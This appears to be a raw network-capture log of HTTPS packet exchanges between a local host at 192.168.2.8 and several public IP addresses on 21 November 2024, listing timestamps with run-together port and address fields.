                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.882266045 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.882318020 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.882333040 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.882347107 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.882376909 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.901047945 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.901088953 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.901143074 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.901165962 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.901190996 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.901225090 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.919892073 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.919928074 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.919966936 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.919975996 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.920008898 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.920033932 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.937643051 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.937664032 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.937738895 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.937772036 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.937812090 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.937829018 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.956784964 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.956804991 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.956868887 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.956903934 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.956913948 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.956970930 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.054177999 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.054212093 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.054255962 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.054281950 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.054311991 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.054372072 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.068428993 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.068460941 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.068506956 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.068526030 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.068547010 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.068566084 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.082856894 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.082884073 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.082940102 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.082957983 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.082968950 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.082998037 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.094197989 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.094223976 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.094285011 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.094300985 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.094340086 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.106862068 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.106888056 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.106967926 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.106992960 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.107019901 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.107156992 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.116692066 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.116782904 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.116799116 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.116813898 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.116842985 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.116863012 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.117508888 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.117527008 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.157202005 CET4434981240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.157234907 CET4434981240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.157243967 CET4434981240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.157315016 CET4434981240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.157362938 CET49812443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.157409906 CET4434981240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.157433033 CET4434981240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.157438993 CET49812443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.157481909 CET49812443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.157887936 CET49812443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.157928944 CET4434981240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.157955885 CET49812443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.157973051 CET4434981240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.482163906 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.482253075 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.551944017 CET49820443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.551980019 CET4434982013.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.552061081 CET49820443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.552366018 CET49821443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.552412033 CET4434982113.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.552495003 CET49821443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.552531958 CET49822443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.552551031 CET4434982213.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.552588940 CET49822443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.552705050 CET49823443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.552730083 CET4434982313.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.552787066 CET49823443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.552897930 CET49824443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.552968025 CET4434982413.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.553019047 CET49824443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.553069115 CET49825443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.553098917 CET4434982513.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.553144932 CET49825443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.553361893 CET49820443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.553375006 CET4434982013.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.553621054 CET49821443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.553632975 CET4434982113.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.553705931 CET49822443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.553719044 CET4434982213.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.553828955 CET49823443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.553836107 CET4434982313.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.553982973 CET49824443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.554001093 CET4434982413.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.554157972 CET49825443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.554172993 CET4434982513.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.631428003 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.635596991 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.635631084 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.637047052 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.637489080 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.637629032 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.637764931 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.637803078 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.637814045 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.688517094 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.688551903 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.690877914 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.690897942 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.119421959 CET4434981920.189.173.2192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.121408939 CET49819443192.168.2.820.189.173.2
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.121417999 CET4434981920.189.173.2192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.122497082 CET4434981920.189.173.2192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.122611046 CET49819443192.168.2.820.189.173.2
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.123848915 CET49819443192.168.2.820.189.173.2
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.123912096 CET4434981920.189.173.2192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.124164104 CET49819443192.168.2.820.189.173.2
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.124164104 CET49819443192.168.2.820.189.173.2
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.124171972 CET4434981920.189.173.2192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.124197006 CET4434981920.189.173.2192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.135535002 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.135569096 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.135631084 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.135654926 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.135703087 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.135732889 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.135747910 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.163674116 CET4434981820.189.173.2192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.164005041 CET49818443192.168.2.820.189.173.2
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.164021015 CET4434981820.189.173.2192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.165090084 CET4434981820.189.173.2192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.165186882 CET49818443192.168.2.820.189.173.2
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.165601969 CET49818443192.168.2.820.189.173.2
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.165678978 CET4434981820.189.173.2192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.165741920 CET49818443192.168.2.820.189.173.2
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.165783882 CET49818443192.168.2.820.189.173.2
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.165793896 CET4434981820.189.173.2192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.168169022 CET49819443192.168.2.820.189.173.2
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.214323997 CET49818443192.168.2.820.189.173.2
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.353168011 CET4434974023.206.229.226192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.353272915 CET49740443192.168.2.823.206.229.226
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.367495060 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.367521048 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.367537022 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.367567062 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.367604017 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.367611885 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.367660046 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.400347948 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.400361061 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.400391102 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.400418997 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.400455952 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.400475025 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.400496960 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.420280933 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.420300007 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.420353889 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.420373917 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.420393944 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.420416117 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.459211111 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.459239006 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.459281921 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.459347010 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.459367037 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.459386110 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.527674913 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.527702093 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.527770996 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.527793884 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.527872086 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.527872086 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.528520107 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.528546095 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.528584003 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.528619051 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.528635025 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.528681040 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.578763008 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.578787088 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.578825951 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.578860044 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.578881979 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.579092026 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.584583044 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.584603071 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.584652901 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.584667921 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.584686041 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.584711075 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.622092009 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.626830101 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.626852989 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.626892090 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.626926899 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.626944065 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.626966000 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.631474972 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.631493092 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.631537914 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.631550074 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.631575108 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.631589890 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.647038937 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.647058010 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.647103071 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.647140980 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.647159100 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.647584915 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.660666943 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.660687923 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.660773039 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.660773039 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.660785913 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.660826921 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.681854963 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.681895971 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.681934118 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.681969881 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.681988001 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.681988955 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.682029963 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.684977055 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.685012102 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.733171940 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.733192921 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.733253956 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.733268023 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.733279943 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.733727932 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.744545937 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.744755030 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.755825043 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.755844116 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.755909920 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.755925894 CET4434981449.13.32.95192.168.2.8
